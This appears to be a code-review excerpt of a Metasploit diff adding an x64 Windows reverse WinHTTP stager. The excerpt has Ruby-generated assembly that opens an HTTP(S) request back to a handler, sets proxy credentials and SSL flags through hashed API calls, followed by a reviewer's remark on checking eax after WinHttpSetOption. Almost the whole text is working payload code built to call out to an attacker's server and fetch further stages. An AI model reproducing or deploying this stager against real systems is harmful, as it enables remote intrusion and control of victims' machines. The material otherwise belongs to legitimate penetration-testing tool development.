lib/msf/core/payload/windows/x64/reverse_winhttp.rb

```diff
@@ -0,0 +1,482 @@
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
+        call rbp
+
+      WinHttpOpenRequest:
+        call get_server_uri
+        db #{encoded_url}
+      get_server_uri:
+        pop r8                        ; Stack pointer (pwszObjectName)
+        xor r9, r9                    ; NULL (pwszVersion)
+        push rbx                      ; 0 for alignment
+        ; the push/pop sequence saves a byte over XOR
+        push rbx                      ; push 0
+        pop rdx                       ; NULL (pwszVerb - defaults to GET)
+        mov rcx, rax                  ; returned by WinHttpConnect (hConnect)
+        push 0x#{http_open_flags.to_s(16)} ; (dwFlags)
+        push rbx                      ; NULL (ppwszAcceptTypes)
+        push rbx                      ; NULL (pwszReferer)
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
+        call rbp
+        xchg rsi, rax                 ; save HttpRequest handle in rsi
+      ^
+
+    if proxy_enabled && proxy_user
+      asm << %Q^
+      set_up_proxy_config:
+        push rbx               ; pAuthParams (NULL)
+      ^
+
+      if proxy_pass
+        asm << %Q^
+        call got_proxy_pass    ; put proxy_pass on the stack
+      proxy_pass:
+        db #{proxy_pass}
+      got_proxy_pass:
+                               ; pwszPassword now on the stack
+        ^
+      else
+        asm << %Q^
+        push rbx               ; pwszPassword (NULL)
+        ^
+      end
+
+      asm << %Q^
+        call got_proxy_user           ; put proxy user on the stack
+      proxy_user:
+        db #{proxy_user}
+      got_proxy_user:
+        pop r9                        ; Get proxy user (pwszUserName)
+        ; the push/pop sequence saves a byte over XOR
+        push rbx                      ; push 0
+        pop rdx                       ; rdx is now 0
+        inc edx                       ; WINHTTP_AUTH_TARGET_PROXY = 1 (dwAuthSceme)
+        mov r8, rdx                   ; WINHTTP_AUTH_SCHEME_BASIC = 1 (dwAuthTargets)
+        mov rcx, rsi                  ; Request handle (hRequest)
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
+        call rbp
+      ^
+    end
+
+    if opts[:ssl]
+      asm << %Q^
+      set_security_options:
+        mov rcx, rsi                  ; Handle for request (hConnect)
+        push 31
+        pop rdx                       ; WINHTTP_OPTION_SECURITY_FLAGS (dwOption)
+        push 0x#{secure_flags.to_s(16)}
+        mov r8, rsp                   ; Pointer to flags (lpBuffer)
+        push 4
+        pop r9                        ; 4 (dwBufferLength)
+        push rbx                      ; 0 for alignment
+        push rbx                      ; 0 for alignment
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
+        call rbp
+        test eax, eax                 ; use eax, it's 1 byte less than rax
```

Comment:
If `WinHttpSetOption` can ever return an error with a value greater than 0xffff_ffff, this will be wrong.